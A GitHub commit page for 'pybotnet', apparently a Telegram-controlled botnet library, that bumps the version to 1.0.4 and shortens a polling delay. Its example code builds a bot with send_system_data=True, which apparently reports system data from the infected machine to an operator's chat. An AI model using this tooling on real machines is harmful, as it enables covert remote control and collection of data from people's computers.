Skip to content

Commit

Permalink
up to '1.0.4',
Browse files Browse the repository at this point in the history
Fixed a small issue
  • Loading branch information
onionj committed Nov 29, 2021
1 parent ed97365 commit f4ac7a1
Show file tree
Hide file tree
Showing 3 changed files with 3 additions and 3 deletions.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -72,7 +72,7 @@ ADMIN_CHAT_ID = '12345678910'
bot = pybotnet.PyBotNet(TELEGRAM_TOKEN, ADMIN_CHAT_ID,
show_log=True, send_system_data=True)

delay = 10
delay = 7

while True:
print('*-*'*15)
Expand Down
2 changes: 1 addition & 1 deletion pybotnet/settings.py
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@

pybotnet_version = '1.0.3'
pybotnet_version = '1.0.4'
pybotnet_github_link = 'https://github.com/onionj/pybotnet'
pybotnet_license = 'GNU Lesser General Public License v3 or later (LGPLv3+)'
pybotnet_pypi_link = 'https://pypi.org/project/pybotnet/'
Expand Down
2 changes: 1 addition & 1 deletion simple_code.py
Original file line number Diff line number Diff line change
Expand Up @@ -11,7 +11,7 @@
bot = pybotnet.PyBotNet(TELEGRAM_TOKEN, ADMIN_CHAT_ID,
show_log=True, send_system_data=True)

delay = 10
delay = 5

while True:
print('*-*'*15)
Expand Down

0 comments on commit f4ac7a1

Please sign in to comment.